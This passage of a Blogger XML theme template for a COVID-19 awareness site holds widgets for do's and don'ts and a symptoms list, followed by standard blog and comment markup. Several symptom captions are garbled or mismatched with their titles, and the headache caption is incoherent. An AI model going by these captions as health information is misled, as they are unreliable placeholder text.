<h3 class='service-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='service-snippet'><data:caption/></p>
</b:if>
</div>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image23' locked='true' title='Social Distancing' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://2.bp.blogspot.com/-VJfdiclCz4E/Xs5qOGhphpI/AAAAAAAAIgI/TIUToSQXC2Y1jckzVuEiJdcxmXcu88ipgCK4BGAYYCw/s1600/donts-3.png</b:widget-setting>
<b:widget-setting name='displayHeight'>160</b:widget-setting>
<b:widget-setting name='sectionWidth'>201</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>160</b:widget-setting>
<b:widget-setting name='link'>image</b:widget-setting>
<b:widget-setting name='caption'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#intro-author-wrap{display:block}
</style>
<div class='service-content'>
<b:if cond='data:link == "image"'>
<b:class name='service-icon-image'/>
<span class='service-icon'><img expr:alt='data:title' expr:src='data:sourceUrl'/></span>
<b:else/>
<span class='service-icon'><i expr:class='"fa " + data:link'/></span>
</b:if>
<div class='service-content-details'>
<h3 class='service-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='service-snippet'><data:caption/></p>
</b:if>
</div>
</div>
</div>
</b:includable>
</b:widget>
</b:section>
<b:section class='author-list right-side-widget' id='intro-services-right' maxwidgets='8' name='Do's' showaddelement='yes'>
<b:widget id='Image24' locked='true' title='Wash Your Hands' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://1.bp.blogspot.com/-glNPqJPwBXM/Xs5qRuHGKnI/AAAAAAAAIgQ/kGGCOVISqYoNNaO-rvBZtNcL6YSshFB8gCK4BGAYYCw/s1600/dos-1.png</b:widget-setting>
<b:widget-setting name='displayHeight'>160</b:widget-setting>
<b:widget-setting name='sectionWidth'>201</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>160</b:widget-setting>
<b:widget-setting name='link'>image</b:widget-setting>
<b:widget-setting name='caption'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#intro-author-wrap{display:block}
</style>
<div class='service-content'>
<b:if cond='data:link == "image"'>
<b:class name='service-icon-image'/>
<span class='service-icon'><img expr:alt='data:title' expr:src='data:sourceUrl'/></span>
<b:else/>
<span class='service-icon'><i expr:class='"fa " + data:link'/></span>
</b:if>
<div class='service-content-details'>
<h3 class='service-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='service-snippet'><data:caption/></p>
</b:if>
</div>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image25' locked='true' title='Drink Much Watar' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://4.bp.blogspot.com/-SfqwwByOQaQ/Xs5qVK9XSjI/AAAAAAAAIgc/DWyAcZfZVOQZU6T3nDR8qZv_52qdwYt6gCK4BGAYYCw/s1600/dos-2.png</b:widget-setting>
<b:widget-setting name='displayHeight'>160</b:widget-setting>
<b:widget-setting name='sectionWidth'>201</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>160</b:widget-setting>
<b:widget-setting name='link'>image</b:widget-setting>
<b:widget-setting name='caption'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#intro-author-wrap{display:block}
</style>
<div class='service-content'>
<b:if cond='data:link == "image"'>
<b:class name='service-icon-image'/>
<span class='service-icon'><img expr:alt='data:title' expr:src='data:sourceUrl'/></span>
<b:else/>
<span class='service-icon'><i expr:class='"fa " + data:link'/></span>
</b:if>
<div class='service-content-details'>
<h3 class='service-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='service-snippet'><data:caption/></p>
</b:if>
</div>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image26' locked='true' title='Use Face Mask' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://3.bp.blogspot.com/-flOpMcNHIdM/Xs5qYRDZDUI/AAAAAAAAIgk/iF46xuqTJhUX-qO3QCf9WUfOOgaeylV1QCK4BGAYYCw/s1600/dos-3.png</b:widget-setting>
<b:widget-setting name='displayHeight'>160</b:widget-setting>
<b:widget-setting name='sectionWidth'>201</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>160</b:widget-setting>
<b:widget-setting name='link'>image</b:widget-setting>
<b:widget-setting name='caption'>Lorem Ipsum is simply dummy text of the printing and typesetting industry.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#intro-author-wrap{display:block}
</style>
<div class='service-content'>
<b:if cond='data:link == "image"'>
<b:class name='service-icon-image'/>
<span class='service-icon'><img expr:alt='data:title' expr:src='data:sourceUrl'/></span>
<b:else/>
<span class='service-icon'><i expr:class='"fa " + data:link'/></span>
</b:if>
<div class='service-content-details'>
<h3 class='service-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='service-snippet'><data:caption/></p>
</b:if>
</div>
</div>
</div>
</b:includable>
</b:widget>
</b:section>
</div>
</div>
</div>
<div class='clearfix'/>
<div id='testimonial-wrap'>
<div class='container row'>
<b:section class='head-text' id='head-text2' maxwidgets='1' name='Headline Text 02' showaddelement='no'>
<b:widget id='Text2' locked='true' title='Coronavirus Symptoms' type='Text' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='content'><![CDATA[Lorem Ipsum has been the industry's standard dummy text.]]></b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='widget-title'/>
<p class='widget-content'><data:content/></p>
</b:includable>
</b:widget>
</b:section>
<b:section id='testimonial' maxwidgets='8' name='Symptoms List' showaddelement='no'>
<b:widget id='Image6' locked='true' title='Dry Dough' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://3.bp.blogspot.com/-xewKCGXHBCA/Xs5ztmmgqzI/AAAAAAAAIhA/nR7pD0vziRcwTN9Pg3Z3IloTrbIZfTKGgCK4BGAYYCw/s1600/symp-1.png</b:widget-setting>
<b:widget-setting name='displayHeight'>260</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>266</b:widget-setting>
<b:widget-setting name='link'>Leave Blank</b:widget-setting>
<b:widget-setting name='caption'>Continuous coughing a lot for more than an hour, or 3 or more coughing episodes in 24 hours.if you usually have a cough, it may be worse than usual.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#testimonial-wrap{display:block}
</style>
<div class='testi-avatar'><div class='kovid-hex'>
<div class='kovid-hex-inner'/>
</div><img expr:alt='data:title' expr:src='data:sourceUrl'/></div>
<div class='testi-info'>
<h3 class='testi-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='testi-meta'><data:caption/></p>
</b:if>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image7' locked='true' title='Sore Throat' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://3.bp.blogspot.com/-syqo8idWppM/Xs5z-y3X0pI/AAAAAAAAIhM/xIOXUH0vKsciIWsd5DOQ1bVGMeVmdHPrACK4BGAYYCw/s1600/symp-2.png</b:widget-setting>
<b:widget-setting name='displayHeight'>260</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>264</b:widget-setting>
<b:widget-setting name='link'>Leave Blank</b:widget-setting>
<b:widget-setting name='caption'>Older people, and those with underlying medical problems like high blood pressure, heart and lung problems, diabetes, or cancer.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#testimonial-wrap{display:block}
</style>
<div class='testi-avatar'><div class='kovid-hex'>
<div class='kovid-hex-inner'/>
</div><img expr:alt='data:title' expr:src='data:sourceUrl'/></div>
<div class='testi-info'>
<h3 class='testi-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='testi-meta'><data:caption/></p>
</b:if>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image8' locked='true' title='Cold' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://2.bp.blogspot.com/-Y0wrcjtjQoI/Xs50J_LqLWI/AAAAAAAAIhU/zlOXR9vxQPoZSP04i0UA4n58eLnrZVJkACK4BGAYYCw/s1600/symp-3.png</b:widget-setting>
<b:widget-setting name='displayHeight'>260</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>264</b:widget-setting>
<b:widget-setting name='link'>Leave Blank</b:widget-setting>
<b:widget-setting name='caption'>People of all ages who experience fever and/or cough associated with difficulty breathing/shortness of breath.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#testimonial-wrap{display:block}
</style>
<div class='testi-avatar'><div class='kovid-hex'>
<div class='kovid-hex-inner'/>
</div><img expr:alt='data:title' expr:src='data:sourceUrl'/></div>
<div class='testi-info'>
<h3 class='testi-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='testi-meta'><data:caption/></p>
</b:if>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image9' locked='true' title='Fever' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://1.bp.blogspot.com/-lZK0rcxkTfk/Xs50M0gdGiI/AAAAAAAAIhc/k6Scp0_xnyobYugdgtVgen66q_QGRtmGgCK4BGAYYCw/s1600/symp-4.png</b:widget-setting>
<b:widget-setting name='displayHeight'>260</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>264</b:widget-setting>
<b:widget-setting name='link'>Leave Blank</b:widget-setting>
<b:widget-setting name='caption'>Fever you feel hot to touch on your chest or back (you do not need to measure your temperature). It is also may appear in 2-10 days.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#testimonial-wrap{display:block}
</style>
<div class='testi-avatar'><div class='kovid-hex'>
<div class='kovid-hex-inner'/>
</div><img expr:alt='data:title' expr:src='data:sourceUrl'/></div>
<div class='testi-info'>
<h3 class='testi-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='testi-meta'><data:caption/></p>
</b:if>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image10' locked='true' title='Headache' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://3.bp.blogspot.com/-sB3bmhdEnyk/Xs50PkHwoHI/AAAAAAAAIho/uDwZqhaEjDs-lSB_VZ5WS-ffPIs42--MwCK4BGAYYCw/s1600/symp-5.png</b:widget-setting>
<b:widget-setting name='displayHeight'>260</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>264</b:widget-setting>
<b:widget-setting name='link'>Leave Blank</b:widget-setting>
<b:widget-setting name='caption'><![CDATA[Headache is a key symptom, experts say. Don't fixate on a relaxation, but know it's really danger until your headache reaches at maximum.]]></b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#testimonial-wrap{display:block}
</style>
<div class='testi-avatar'><div class='kovid-hex'>
<div class='kovid-hex-inner'/>
</div><img expr:alt='data:title' expr:src='data:sourceUrl'/></div>
<div class='testi-info'>
<h3 class='testi-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='testi-meta'><data:caption/></p>
</b:if>
</div>
</div>
</b:includable>
</b:widget>
<b:widget id='Image11' locked='true' title='Vomiting' type='Image' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='displayUrl'>http://4.bp.blogspot.com/-xTM1432M32c/Xs50SoxhjBI/AAAAAAAAIhw/ucvbOcpCXhAtmSXlI4p1aatQLXMQxbzTACK4BGAYYCw/s1600/symp-6.png</b:widget-setting>
<b:widget-setting name='displayHeight'>260</b:widget-setting>
<b:widget-setting name='sectionWidth'>150</b:widget-setting>
<b:widget-setting name='shrinkToFit'>false</b:widget-setting>
<b:widget-setting name='displayWidth'>264</b:widget-setting>
<b:widget-setting name='link'>Leave Blank</b:widget-setting>
<b:widget-setting name='caption'>Around 1 out of every 6 people who gets COVID-19 becomes seriously ill and develops difficulty, causes motion sickness and vomiting.</b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='content'/>
</b:includable>
<b:includable id='content'>
<div class='widget-content'>
<style type='text/css'>
#testimonial-wrap{display:block}
</style>
<div class='testi-avatar'><div class='kovid-hex'>
<div class='kovid-hex-inner'/>
</div><img expr:alt='data:title' expr:src='data:sourceUrl'/></div>
<div class='testi-info'>
<h3 class='testi-title'><data:title/></h3>
<b:if cond='data:caption'>
<p class='testi-meta'><data:caption/></p>
</b:if>
</div>
</div>
</b:includable>
</b:widget>
</b:section>
</div>
</div>
<div class='clearfix'/>
</b:if>
<!-- Content Wrapper -->
<div id='content-wrapper'>
<div class='container row'>
<!-- Main Wrapper -->
<div id='main-wrapper'>
<b:if cond='data:view.isMultipleItems'>
<b:section class='head-text' id='head-text1' maxwidgets='1' name='Headline Text 03' showaddelement='no'>
<b:widget id='Text1' locked='true' title='Recent Blog Posts' type='Text' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='content'><![CDATA[Lorem Ipsum has been the industry's standard dummy text.]]></b:widget-setting>
</b:widget-settings>
<b:includable id='main'>
<b:include name='widget-title'/>
<p class='widget-content'><data:content/></p>
</b:includable>
</b:widget>
</b:section>
<div class='clearfix'/>
</b:if>
<b:section class='main' id='main' maxwidgets='1' name='Main Posts' showaddelement='yes'>
<b:widget id='Blog1' locked='true' title='Blog Posts' type='Blog' version='2' visible='true'>
<b:widget-settings>
<b:widget-setting name='commentLabel'>Comments</b:widget-setting>
<b:widget-setting name='showShareButtons'>true</b:widget-setting>
<b:widget-setting name='authorLabel'>by</b:widget-setting>
<b:widget-setting name='disableGooglePlusShare'>true</b:widget-setting>
<b:widget-setting name='style.unittype'>TextAndImage</b:widget-setting>
<b:widget-setting name='timestampLabel'/>
<b:widget-setting name='reactionsLabel'>Reactions</b:widget-setting>
<b:widget-setting name='showAuthorProfile'>false</b:widget-setting>
<b:widget-setting name='style.layout'>1x1</b:widget-setting>
<b:widget-setting name='showLocation'>false</b:widget-setting>
<b:widget-setting name='showTimestamp'>true</b:widget-setting>
<b:widget-setting name='postsPerAd'>1</b:widget-setting>
<b:widget-setting name='style.bordercolor'>#ffffff</b:widget-setting>
<b:widget-setting name='backlinksLabel'>Related Posts</b:widget-setting>
<b:widget-setting name='showDateHeader'>false</b:widget-setting>
<b:widget-setting name='style.textcolor'>#222222</b:widget-setting>
<b:widget-setting name='showCommentLink'>true</b:widget-setting>
<b:widget-setting name='style.urlcolor'>#121158</b:widget-setting>
<b:widget-setting name='showAuthor'>true</b:widget-setting>
<b:widget-setting name='style.linkcolor'>#e7015e</b:widget-setting>
<b:widget-setting name='style.bgcolor'>#ffffff</b:widget-setting>
<b:widget-setting name='showLabels'>true</b:widget-setting>
<b:widget-setting name='postLabelsLabel'>Tags:</b:widget-setting>
<b:widget-setting name='showBacklinks'>true</b:widget-setting>
<b:widget-setting name='showInlineAds'>false</b:widget-setting>
<b:widget-setting name='showReactions'>false</b:widget-setting>
</b:widget-settings>
<b:includable id='main' var='this'>
<b:include name='searchMessage'/>
<div class='blog-posts hfeed'>
<b:class cond='data:view.isMultipleItems' name='index-post-wrap'/>
<b:class cond='data:view.isSingleItem' name='item-post-wrap'/>
<b:tag class='grid-posts' cond='data:view.isMultipleItems' name='div'>
<b:loop index='i' values='data:posts' var='post'>
<b:include data='post' name='postCommentsAndAd'/>
</b:loop>
</b:tag>
</div>
<b:include cond='data:view.isMultipleItems' name='postPagination'/>
<b:include name='feedLinks'/>
</b:includable>
<b:includable id='aboutPostAuthor'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='addComments'>
<a expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'>
<b:message name='messages.postAComment'/>
</a>
</b:includable>
<b:includable id='backLinks' var='post'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='blogThisShare'>
<b:with value='"window.open(this.href, \"_blank\", \"height=270,width=475\"); return false;"' var='onclick'>
<b:include name='platformShare'/>
</b:with>
</b:includable>
<b:includable id='bylineByName' var='byline'>
<b:switch var='data:byline.name'>
<b:case value='share'/>
<b:include cond='data:post.shareUrl' name='postShareButtons'/>
<b:case value='comments'/>
<b:include cond='data:post.allowComments' name='postCommentsLink'/>
<b:case value='location'/>
<b:include cond='data:post.location' name='postLocation'/>
<b:case value='timestamp'/>
<b:include cond='not data:view.isPage' name='postTimestamp'/>
<b:case value='author'/>
<b:include name='postAuthor'/>
<b:case value='labels'/>
<b:include cond='data:post.labels' name='postLabels'/>
<b:case value='icons'/>
<b:include cond='data:post.emailPostUrl' name='emailPostIcon'/>
<b:case value='reactions'/>
<b:include cond='data:post.reactionsUrl' name='postReactions'/>
</b:switch>
</b:includable>
<b:includable id='bylineRegion' var='regionItems'>
<b:loop values='data:regionItems' var='byline'>
<b:include data='byline' name='bylineByName'/>
</b:loop>
</b:includable>
<b:includable id='commentAuthorAvatar'>
<div class='avatar-image-container'>
<img class='author-avatar' expr:src='data:comment.authorAvatarSrc' height='45' width='45'/>
</div>
</b:includable>
<b:includable id='commentDeleteIcon' var='comment'>
<span expr:class='"item-control " + data:comment.adminClass'>
<b:if cond='data:showCmtPopup'>
<div class='goog-toggle-button'>
<div class='goog-inline-block comment-action-icon'/>
</div>
<b:else/>
<a class='comment-delete' expr:href='data:comment.deleteUrl' expr:title='data:messages.deleteComment'>
<img src='https://resources.blogblog.com/img/icon_delete13.gif'/>
</a>
</b:if>
</span>
</b:includable>
<b:includable id='commentForm' var='post'>
<div class='comment-form'>
<a name='comment-form'/>
<b:if cond='data:this.messages.blogComment != ""'>
<p><data:this.messages.blogComment/></p>
</b:if>
<b:include data='post' name='commentFormIframeSrc'/>
<iframe allowtransparency='allowtransparency' class='blogger-iframe-colorize blogger-comment-from-post' expr:height='data:cmtIframeInitialHeight ?: "90px"' frameborder='0' id='comment-editor' name='comment-editor' src='' width='100%'/>
<data:post.cmtfpIframe/>
<script type='text/javascript'>
BLOG_CMT_createIframe('<data:post.appRpcRelayPath/>');
</script>
</div>
</b:includable>
<b:includable id='commentFormIframeSrc' var='post'>
<a expr:href='data:post.commentFormIframeSrc + "&skin=contempo"' id='comment-editor-src'/>
</b:includable>
<b:includable id='commentItem' var='comment'>
<div class='comment' expr:id='"c" + data:comment.id'>
<b:include cond='data:blog.enabledCommentProfileImages' name='commentAuthorAvatar'/>
<div class='comment-block'>
<div class='comment-author'>
<b:if cond='data:comment.authorUrl'>
<b:message name='messages.authorSaidWithLink'>
<b:param expr:value='data:comment.author' name='authorName'/>
<b:param expr:value='data:comment.authorUrl' name='authorUrl'/>
</b:message>
<b:else/>
<b:message name='messages.authorSaid'>
<b:param expr:value='data:comment.author' name='authorName'/>
</b:message>
</b:if>
</div>
<div expr:class='"comment-body" + (data:comment.isDeleted ? " deleted" : "")'>
<data:comment.body/>
</div>
<div class='comment-footer'>
<span class='comment-timestamp'>
<a expr:href='data:comment.url' title='comment permalink'>
<data:comment.timestamp/>
</a>
<b:include data='comment' name='commentDeleteIcon'/>
</span>
</div>
</div>
</div>
</b:includable>
<b:includable id='commentList' var='comments'>
<div id='comments-block'>
<b:loop values='data:comments' var='comment'>
<b:include data='comment' name='commentItem'/>
</b:loop>
</div>
</b:includable>
<b:includable id='commentPicker' var='post'>
<b:if cond='data:post.commentSource == 1'>
<b:include data='post' name='iframeComments'/>
<b:elseif cond='data:post.showThreadedComments'/>
<b:include data='post' name='threadedComments'/>
<b:else/>
<b:include data='post' name='comments'/>
</b:if>
</b:includable>
<b:includable id='comments' var='post'>
<section expr:class='"comments" + (data:post.embedCommentForm ? " embed" : "")' expr:data-num-comments='data:post.numberOfComments' id='comments'>
<a name='comments'/>
<b:if cond='data:post.allowComments'>
<b:include name='commentsTitle'/>
<div expr:id='data:widget.instanceId + "_comments-block-wrapper"'>
<b:include cond='data:post.comments' data='post.comments' name='commentList'/>
</div>
<b:if cond='data:post.commentPagingRequired'>
<div class='paging-control-container'>
<b:if cond='data:post.hasOlderLinks'>
<a expr:class='data:post.oldLinkClass' expr:href='data:post.oldestLinkUrl'>
<data:messages.oldest/>
</a>
<a expr:class='data:post.oldLinkClass' expr:href='data:post.olderLinkUrl'>
<data:messages.older/>
</a>
</b:if>
<span class='comment-range-text'>
<data:post.commentRangeText/>
</span>
<b:if cond='data:post.hasNewerLinks'>
<a expr:class='data:post.newLinkClass' expr:href='data:post.newerLinkUrl'>
<data:messages.newer/>
</a>
<a expr:class='data:post.newLinkClass' expr:href='data:post.newestLinkUrl'>
<data:messages.newest/>
</a>
</b:if>
</div>
</b:if>
<div class='footer'>
<b:if cond='data:post.embedCommentForm'>
<b:if cond='data:post.allowNewComments'>
<b:include data='post' name='commentForm'/>
<b:else/>
<data:post.noNewCommentsText/>
</b:if>
<b:else/>
<b:if cond='data:post.allowComments'>
<b:include data='post' name='addComments'/>
</b:if>
</b:if>
</div>
</b:if>
<b:if cond='data:showCmtPopup'>
<div id='comment-popup'>
<iframe allowtransparency='allowtransparency' frameborder='0' id='comment-actions' name='comment-actions' scrolling='no'>
</iframe>
</div>
</b:if>
</section>
</b:includable>
<b:includable id='commentsLink'>
<a class='comment-link' expr:href='data:post.commentsUrl' expr:onclick='data:post.commentsUrlOnclick'>
<b:if cond='data:post.numberOfComments > 0'>
<b:message name='messages.numberOfComments'>
<b:param expr:value='data:post.numberOfComments' name='numComments'/>
</b:message>
<b:else/>
<data:messages.postAComment/>
</b:if>
</a>
</b:includable>
<b:includable id='commentsLinkIframe'>
<!-- G+ comments, no longer available. The includable is retained for backwards-compatibility. -->
</b:includable>
<b:includable id='commentsTitle'>
<!-- Post Commments Title -->
<h3 class='title'><data:post.numberOfComments/> <data:messages.comments/></h3>
<b:class cond='data:post.numberOfComments == "0"' name='no-comments'/>
</b:includable>
<b:includable id='defaultAdUnit'>
<ins class='adsbygoogle' data-ad-format='auto' expr:data-ad-client='data:adClientId ?: data:blog.adsenseClientId' expr:data-ad-host='data:blog.adsenseHostId' expr:data-analytics-uacct='data:blog.analyticsAccountNumber' expr:style='data:style ?: "display: block;"'/>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</b:includable>
<b:includable id='emailPostIcon'>
<span class='byline post-icons'>
<!-- email post links -->
<span class='item-action'>
<a expr:href='data:post.emailPostUrl' expr:title='data:messages.emailPost'>
<b:include data='{ iconClass: "touch-icon sharing-icon" }' name='emailIcon'/>
</a>
</span>
</span>
</b:includable>
<b:includable id='facebookShare'>
<b:with value='"window.open(this.href, \"_blank\", \"height=430,width=640\"); return false;"' var='onclick'>
<b:include name='platformShare'/>
</b:with>
</b:includable>
<b:includable id='feedLinks'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='feedLinksBody' var='links'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='footerBylines' var='post'>
<!-- Post Footer Extras -->
<b:include data='post' name='postLabels'/>
<b:include data='post' name='postShareButtons'/>
</b:includable>
<b:includable id='googlePlusShare'>
<div class='goog-inline-block google-plus-share-container'>
<g:plusone annotation='inline' expr:href='data:originalUrl.canonical.http' size='medium' source='blogger:blog:plusone'/>
</div>
</b:includable>
<b:includable id='headerByline' var='post'>
<!-- Post Header Meta -->
<div class='post-meta'>
<b:include data='post' name='postAuthor'/>
<b:include data='post' name='postTimestamp'/>
</div>
</b:includable>
<b:includable id='homePageLink'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='iframeComments' var='post'>
<b:if cond='data:post.allowIframeComments'>
<script expr:src='data:post.iframeCommentSrc' type='text/javascript'/>
<div class='cmt_iframe_holder' expr:data-href='data:post.url.canonical' expr:data-viewtype='data:post.viewType'/>
<b:if cond='!data:post.embedCommentForm'>
<b:include data='post' name='commentsLink'/>
</b:if>
</b:if>
</b:includable>
<b:includable id='indexPost' var='post'>
<!-- Index Post Content -->
<b:include data='post' name='postFeaturedImage'/>
<div class='post-content'>
<div class='post-info'>
<b:include data='post' name='postTitle'/>
<div class='clearfix'/>
<div class='post-meta'>
<b:include data='post' name='postAuthor'/> <b:include data='post' name='postTimestamp'/>
<b:include data='post' name='postCategory'/>
</div>
<div class='clearfix'/>
<b:include data='post' name='postSummary'/>
</div>
</div>
</b:includable>
<b:includable id='inlineAd' var='post'>
<b:comment>Disabled</b:comment>
</b:includable>
<b:includable id='itemPost' var='post'>
<!-- Item Post Content -->
<b:include data='post' name='postMeta'/>
<div class='post-header'>
<b:include data='post' name='postHeader'/>
</div>
<b:include data='post' name='postBody'/>
<b:include cond='data:view.isPost' data='post' name='postFooter'/>
</b:includable>
<b:includable id='linkShare'>
<b:with value='"window.prompt(\"Copy to clipboard: Ctrl+C, Enter\", \"" + data:originalUrl + "\"); return false;"' var='onclick'>
<b:include name='platformShare'/>
</b:with>
</b:includable>
<b:includable id='nextPageLink'>
<a class='blog-pager-older-link' expr:href='data:olderPageUrl' expr:id='data:widget.instanceId + "_blog-pager-older-link"' expr:title='data:messages.olderPosts'>
<data:messages.showMore/>
</a>
</b:includable>
<b:includable id='otherSharingButton'>
<span class='sharing-platform-button sharing-element-other' expr:aria-label='data:messages.shareToOtherApps.escaped' expr:data-url='data:originalUrl' expr:title='data:messages.shareToOtherApps.escaped' role='menuitem' tabindex='-1'>
<b:with value='{key: "sharingOther"}' var='platform'>
<b:include name='sharingPlatformIcon'/>
</b:with>
<span class='platform-sharing-text'><data:messages.shareOtherApps.escaped/></span>
</span>
</b:includable>
<b:includable id='platformShare'>
<a expr:class='"goog-inline-block sharing-" + data:platform.key' expr:data-url='data:originalUrl' expr:href='data:shareUrl + "&target=" + data:platform.target' expr:onclick='data:onclick ? data:onclick : ""' expr:title='data:platform.shareMessage' target='_blank'>
<span class='share-button-link-text'>
<data:platform.shareMessage/>
</span>
</a>
</b:includable>
<b:includable id='post' var='post'>
<!-- Post Index -->
<b:include cond='data:view.isMultipleItems' data='post' name='indexPost'/>
<!-- Post Item -->
<b:include cond='data:view.isSingleItem' data='post' name='itemPost'/>
</b:includable>
<b:includable id='postAuthor' var='post'>
<!-- Post Author -->
<b:if cond='data:allBylineItems.author'>
<span class='post-author'><a expr:href='data:post.author.profileUrl' expr:title='data:post.author.name' target='_blank'><data:post.author.name/></a></span>
</b:if>
</b:includable>
<b:includable id='postBody' var='post'>
<!-- Post Body Entry Content-->
<div class='post-body post-content'>
<data:post.body/>
</div>
</b:includable>
<b:includable id='postBodySnippet' var='post'>
<b:include data='post' name='postBody'/>
</b:includable>
<b:includable id='postBreadcrumbs' var='post'>
<!-- Post Breadcrumbs -->
<script type='application/ld+json'>
{
"@context": "http://schema.org",
"@type": "BreadcrumbList",
"itemListElement": [{
"@type": "ListItem",
"position": 1,
"item": {
"name": "<data:messages.home/>",
"@id": "<data:blog.homepageUrl.jsonEscaped/>"
}
},{
"@type": "ListItem",
"position": 2,
"item": {
"name": "<b:if cond='data:post.labels'><data:post.labels.first.name/></b:if>",
"@id": "<data:post.labels.last.url.jsonEscaped/>"
}
},{
"@type": "ListItem",
"position": 3,
"item": {
"name": "<data:post.title/>",
"@id": "<data:post.url.jsonEscaped/>"
}
}]
}
</script>
</b:includable>
<b:includable id='postCategory' var='post'>
<!-- Post Label/Category -->
<b:if cond='data:view.isMultipleItems and data:post.labels'>
<span class='post-tag index-post-tag'>
<data:post.labels.last.name/>
</span>
</b:if>
</b:includable>
<b:includable id='postCommentsAndAd' var='post'>
<!-- Post, Comments and Ads -->
<!-- Post Content Index and Item -->
<div class='blog-post hentry'>
<b:class cond='data:view.isMultipleItems' name='index-post'/>
<b:class cond='data:view.isSingleItem' name='item-post'/>
<b:include data='post' name='post'/>
</div>
<!-- Comments -->
<b:if cond='data:view.isSingleItem and data:post.allowComments'>
<div class='blog-post-comments'>
<b:include data='post' name='threadedCommentsDisqus'/>
<b:include data='post' name='commentPicker'/>
</div>
</b:if>
<b:include cond='data:view.isPost and data:allBylineItems.backlinks' data='post' name='postNavigation'/>
</b:includable>
<b:includable id='postCommentsLink'>
<b:if cond='data:view.isMultipleItems'>
<span class='byline post-comment-link container'>
<b:include cond='data:post.commentSource != 1' name='commentsLink'/>
